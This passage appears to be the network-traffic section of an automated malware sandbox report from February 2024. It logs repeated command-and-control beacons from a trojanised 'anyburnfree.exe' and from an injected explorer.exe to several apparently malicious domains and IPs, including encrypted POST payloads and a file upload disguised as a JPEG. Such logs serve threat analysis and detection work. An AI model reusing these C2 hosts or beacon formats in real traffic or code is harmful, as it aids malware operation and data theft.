                                                                                                                                                                    Feb 8, 2024 19:11:06.414391994 CET132OUTData Raw: 2d 2d 2d 2d 2d 2d 4d 54 41 31 4e 7a 41 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36
                                                                                                                                                                    Data Ascii: ------MTA1NzA3Content-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
                                                                                                                                                                    Feb 8, 2024 19:11:06.414432049 CET6OUTData Raw: ff d8 ff e0
                                                                                                                                                                    Data Ascii:
                                                                                                                                                                    Feb 8, 2024 19:11:06.414442062 CET6OUTData Raw: 00 10 4a 46
                                                                                                                                                                    Data Ascii: JF
                                                                                                                                                                    Feb 8, 2024 19:11:06.414460897 CET6OUTData Raw: 49 46 00 01
                                                                                                                                                                    Data Ascii: IF
                                                                                                                                                                    Feb 8, 2024 19:11:06.414470911 CET6OUTData Raw: 01 01 00 60
                                                                                                                                                                    Data Ascii: `
                                                                                                                                                                    Feb 8, 2024 19:11:06.414485931 CET6OUTData Raw: 00 60 00 00
                                                                                                                                                                    Data Ascii: `
                                                                                                                                                                    Feb 8, 2024 19:11:06.414499998 CET6OUTData Raw: ff db 00 43
                                                                                                                                                                    Data Ascii: C
                                                                                                                                                                    Feb 8, 2024 19:11:06.414518118 CET6OUTData Raw: 00 08 06 06
                                                                                                                                                                    Data Ascii:
                                                                                                                                                                    Feb 8, 2024 19:11:06.414537907 CET6OUTData Raw: 07 06 05 08
                                                                                                                                                                    Data Ascii:
                                                                                                                                                                    Feb 8, 2024 19:11:06.414546967 CET6OUTData Raw: 07 07 07 09
                                                                                                                                                                    Data Ascii:
                                                                                                                                                                    Feb 8, 2024 19:11:09.106950045 CET238INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:08 GMT
                                                                                                                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                    X-Powered-By: PHP/7.4.15
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    126192.168.2.349902185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:06.521552086 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:06.757803917 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:06 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    127192.168.2.349903185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:07.115957975 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:07.352473974 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:07 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    128192.168.2.349904185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:07.784694910 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:08.020899057 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:07 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    129192.168.2.349905185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:08.520891905 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:08.757483959 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:08 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    130192.168.2.349906185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:09.234484911 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:09.471143007 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:09 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                    131192.168.2.349907109.175.29.3980
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:09.363903046 CET300OUTPOST /forum/index.php HTTP/1.1
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Host: cbinr.com
                                                                                                                                                                    Content-Length: 154
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Data Raw: 72 3d 31 35 35 43 34 41 30 33 32 46 46 46 34 35 44 31 36 36 39 31 42 35 33 43 39 35 44 34 34 46 32 34 31 42 42 43 34 45 46 30 38 31 36 37 43 41 39 37 31 37 43 37 34 41 32 32 42 36 39 35 36 33 36 30 43 42 37 36 36 35 43 46 41 46 42 34 43 42 39 44 36 39 30 38 30 45 35 32 44 39 43 43 44 42 31 43 32 45 43 46 35 45 32 37 45 37 44 33 34 42 36 35 33 30 35 30 39 32 43 34 38 35 37 46 37 44 32 31 39 45 33 42 37 37 38 30 36 44 38 34 38 33 37 37 46 43 39 43 38 30 38 37
                                                                                                                                                                    Data Ascii: r=155C4A032FFF45D16691B53C95D44F241BBC4EF08167CA9717C74A22B6956360CB7665CFAFB4CB9D69080E52D9CCDB1C2ECF5E27E7D34B65305092C4857F7D219E3B77806D848377FC9C8087
                                                                                                                                                                    Feb 8, 2024 19:11:09.715529919 CET244INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:09 GMT
                                                                                                                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                    X-Powered-By: PHP/7.4.15
                                                                                                                                                                    Content-Length: 6
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                                                    Data Ascii: <c><d>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    132192.168.2.349908109.175.29.3980640C:\Windows\explorer.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:09.959724903 CET282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://gniojjrdbkvkild.org/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 247
                                                                                                                                                                    Host: sjyey.com
                                                                                                                                                                    Feb 8, 2024 19:11:09.959724903 CET247OUTData Raw: 3b 6e 24 10 82 cc 1d 25 db dc c0 0a 74 07 0b b7 0c 78 cc 91 1a 03 97 6a 79 78 72 e5 32 b0 c2 6a 9f 56 cf 21 06 6a 50 1c ef 98 3f cb 2e 25 d5 f9 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 65 35 e7 8a
                                                                                                                                                                    Data Ascii: ;n$%txjyxr2jV!jP?.%Yt M@NA .[k,vue5jCz/U$uujA@]ZK-@]Tk3W.#|[{E880sA>V@-:3yMguE6MS:AJ}
                                                                                                                                                                    Feb 8, 2024 19:11:10.383829117 CET252INHTTP/1.0 404 Not Found
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:10 GMT
                                                                                                                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                    X-Powered-By: PHP/7.4.15
                                                                                                                                                                    Content-Length: 7
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Data Raw: 03 00 00 00 72 e8 84
                                                                                                                                                                    Data Ascii: r


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    133192.168.2.349909185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:10.071955919 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:10.309535980 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:10 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                    134192.168.2.349910185.196.8.2280
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:10.704565048 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:10.941747904 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:10 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    135192.168.2.34991191.215.85.12080640C:\Windows\explorer.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:10.728559971 CET288OUTPOST /index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://owkwdtvjnkvrsfwd.net/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 233
                                                                                                                                                                    Host: selebration17io.io
                                                                                                                                                                    Feb 8, 2024 19:11:10.728617907 CET233OUTData Raw: 48 9d 8b cb 3a 64 54 50 59 06 21 52 08 a1 5f bb 2f 69 ed 1b 8e 1f d7 aa b3 1c d2 84 70 ff d7 e4 89 af 81 be 74 36 95 c7 a2 5a 6a 7c 8d 96 fd 1b f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 a3 d6 52 cd
                                                                                                                                                                    Data Ascii: H:dTPY!R_/ipt6Zj|_=;}f=B!bORwnOP?Jbe3*6?R#k;34jDH X=)6yq4~uFgrz2!12C7.0z@Ixbth
                                                                                                                                                                    Feb 8, 2024 19:11:10.985950947 CET194INHTTP/1.1 404 Not Found
                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:10 GMT
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 7=[0


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    136192.168.2.349912185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:11.400564909 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:11.637684107 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:11 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    137192.168.2.349913185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:12.048929930 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:12.285572052 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:12 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    138192.168.2.349914185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:12.638453960 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:12.875219107 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:12 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    139192.168.2.349915185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:13.283139944 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:13.519697905 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:13 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    140192.168.2.349916185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:14.012463093 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:14.248800993 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:14 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    141192.168.2.349917185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:14.618441105 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:14.855129957 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:14 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    142192.168.2.349918185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:15.207809925 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:15.444961071 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:15 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    143192.168.2.349919185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:15.800029039 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:16.037609100 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:15 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    144192.168.2.349920185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
